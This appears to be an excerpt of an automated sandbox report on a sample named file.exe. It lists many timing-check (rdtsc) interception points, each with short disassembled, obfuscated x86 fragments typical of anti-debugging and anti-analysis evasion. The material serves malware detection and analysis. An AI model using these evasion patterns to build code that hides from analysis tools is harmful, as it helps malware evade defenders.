              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79B128 second address: 79B1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2549h], edx 0x0000000e mov dword ptr [ebp+122D33F9h], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push ebx 0x0000001c cmc 0x0000001d pop ebx 0x0000001e call 00007F4F3CC87F81h 0x00000023 mov ebx, dword ptr [ebp+122D381Dh] 0x00000029 pop edi 0x0000002a mov dword ptr fs:[00000000h], esp 0x00000031 sub edi, dword ptr [ebp+122D3352h] 0x00000037 mov eax, dword ptr [ebp+122D0E99h] 0x0000003d mov dword ptr [ebp+122D285Fh], ecx 0x00000043 mov edi, dword ptr [ebp+122D3811h] 0x00000049 push FFFFFFFFh 0x0000004b mov di, E030h 0x0000004f mov bh, ah 0x00000051 nop 0x00000052 pushad 0x00000053 jmp 00007F4F3CC87F7Ah 0x00000058 push eax 0x00000059 push edx 0x0000005a pop edx 0x0000005b pop eax 0x0000005c popad 0x0000005d push eax 0x0000005e pushad 0x0000005f ja 00007F4F3CC87F87h 0x00000065 jnp 00007F4F3CC87F7Ch 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79914B second address: 799154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79DED8 second address: 79DEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799154 second address: 799158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 799158 second address: 79915C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79915C second address: 7991F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D27ABh], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov bx, cx 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007F4F3C50B5D8h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ch 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b adc edi, 4F982A68h 0x00000041 mov eax, dword ptr [ebp+122D0E8Dh] 0x00000047 push 00000000h 0x00000049 push ebx 0x0000004a call 00007F4F3C50B5D8h 0x0000004f pop ebx 0x00000050 mov dword ptr [esp+04h], ebx 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc ebx 0x0000005d push ebx 0x0000005e ret 0x0000005f pop ebx 0x00000060 ret 0x00000061 xor dword ptr [ebp+122D1905h], esi 0x00000067 push FFFFFFFFh 0x00000069 adc ebx, 35E600FDh 0x0000006f nop 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007F4F3C50B5E3h 0x00000078 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D183 second address: 79D188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79D188 second address: 79D18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E0BF second address: 79E0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79E0C3 second address: 79E0CD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A169B second address: 7A16A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16A5 second address: 7A16A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16A9 second address: 7A16B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16B8 second address: 7A16BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A16BC second address: 7A16C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1816 second address: 7A1820 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4F3C50B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1820 second address: 7A18E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jg 00007F4F3CC87F84h 0x0000000d nop 0x0000000e xor dword ptr [ebp+122D21F9h], eax 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007F4F3CC87F78h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122DB870h], ebx 0x0000003b mov dword ptr [ebp+122D2627h], edx 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 jmp 00007F4F3CC87F7Ah 0x0000004d mov eax, dword ptr [ebp+122D0969h] 0x00000053 push 00000000h 0x00000055 push ecx 0x00000056 call 00007F4F3CC87F78h 0x0000005b pop ecx 0x0000005c mov dword ptr [esp+04h], ecx 0x00000060 add dword ptr [esp+04h], 0000001Ah 0x00000068 inc ecx 0x00000069 push ecx 0x0000006a ret 0x0000006b pop ecx 0x0000006c ret 0x0000006d or dword ptr [ebp+12476619h], edi 0x00000073 call 00007F4F3CC87F7Ah 0x00000078 jmp 00007F4F3CC87F87h 0x0000007d pop ebx 0x0000007e push FFFFFFFFh 0x00000080 sbb bx, 03F8h 0x00000085 push eax 0x00000086 pushad 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A18E7 second address: 7A18EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A18EB second address: 7A18F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F4F3CC87F7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A5D4D second address: 7A5D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3AD second address: 7AC3BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4F3CC87F76h 0x0000000a jnl 00007F4F3CC87F76h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3BD second address: 7AC3D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4F3C50B5D6h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3D3 second address: 7AC3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4F3CC87F7Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB2A second address: 7ABB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB2E second address: 7ABB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F4F3CC87F78h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F4F3CC87F8Eh 0x0000001a jmp 00007F4F3CC87F88h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB67 second address: 7ABB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB6D second address: 7ABB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB71 second address: 7ABB7B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0953 second address: 7B0974 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4F3CC87F80h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0974 second address: 7B098C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B098C second address: 7B0990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0990 second address: 7B099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B099F second address: 7B09A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B09A3 second address: 7B09B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A83 second address: 7B6A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A95 second address: 7B6A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B575D second address: 7B5773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5773 second address: 7B5794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4F3C50B5E9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5E98 second address: 7B5E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5E9C second address: 7B5EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5EA0 second address: 7B5EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6150 second address: 7B6185 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5E7h 0x00000008 jmp 00007F4F3C50B5E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6185 second address: 7B618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B62FE second address: 7B631D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4F3C50B5E3h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B631D second address: 7B6323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B691A second address: 7B691F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB171 second address: 7BB190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4F3CC87F7Ch 0x00000008 jnc 00007F4F3CC87F76h 0x0000000e jnl 00007F4F3CC87F76h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB190 second address: 7BB1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F4F3C50B5F6h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jo 00007F4F3C50B5D6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB1B3 second address: 7BB1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB2EA second address: 7BB302 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3C50B5DBh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB302 second address: 7BB30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB30C second address: 7BB324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE70 second address: 7BAE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE79 second address: 7BAE8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jne 00007F4F3C50B5E4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BAE8B second address: 7BAE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BBBE5 second address: 7BBBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007F4F3C50B5D8h 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BBECF second address: 7BBED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7BBED3 second address: 7BBF2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 jmp 00007F4F3C50B5E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F4F3C50B5DEh 0x00000014 jnc 00007F4F3C50B5D6h 0x0000001a jmp 00007F4F3C50B5DDh 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74938A second address: 749390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C741C second address: 7C7422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6178 second address: 7C6195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F7Fh 0x0000000b jc 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C6195 second address: 7C619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C619E second address: 7C61A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78D9AF second address: 76DD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4F3C50B5E6h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F4F3C50B5E1h 0x00000013 call dword ptr [ebp+12451017h] 0x00000019 jne 00007F4F3C50B600h 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F4F3C50B5DDh 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b pushad 0x0000002c jmp 00007F4F3C50B5DAh 0x00000031 jns 00007F4F3C50B5D6h 0x00000037 popad 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push edi 0x0000003c pop edi 0x0000003d jmp 00007F4F3C50B5E1h 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 jc 00007F4F3C50B5D6h 0x0000004b jnp 00007F4F3C50B5D6h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DFB3 second address: 78DFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78DFBD second address: 78E004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push edi 0x0000000e jmp 00007F4F3C50B5DFh 0x00000013 pop edi 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jne 00007F4F3C50B5DCh 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007F4F3C50B5DCh 0x00000029 jbe 00007F4F3C50B5D6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E004 second address: 78E009 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E009 second address: 78E057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007F4F3C50B5E3h 0x00000012 pop ebx 0x00000013 jmp 00007F4F3C50B5E3h 0x00000018 popad 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D25C3h], edi 0x00000020 call 00007F4F3C50B5D9h 0x00000025 push edx 0x00000026 jc 00007F4F3C50B5DCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E14C second address: 78E150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E1EE second address: 78E221 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 adc ch, FFFFFFE7h 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F4F3C50B5DCh 0x00000014 jmp 00007F4F3C50B5E7h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E3D7 second address: 78E3F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3CC87F7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4F3CC87F84h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E3F2 second address: 78E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E4E0 second address: 78E502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4F3CC87F87h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E8A9 second address: 78E8D1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D3775h] 0x00000013 push 0000001Eh 0x00000015 push ebx 0x00000016 mov ecx, dword ptr [ebp+122D1BC5h] 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F4F3C50B5D8h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E8D1 second address: 78E8D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78EA1E second address: 78EA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78EA26 second address: 78EA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 78E3E1 second address: 78E3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F4F3C50B5E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73D908 second address: 73D90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73D90C second address: 73D916 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C64A6 second address: 7C64B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Dh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7C64B8 second address: 7C64BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
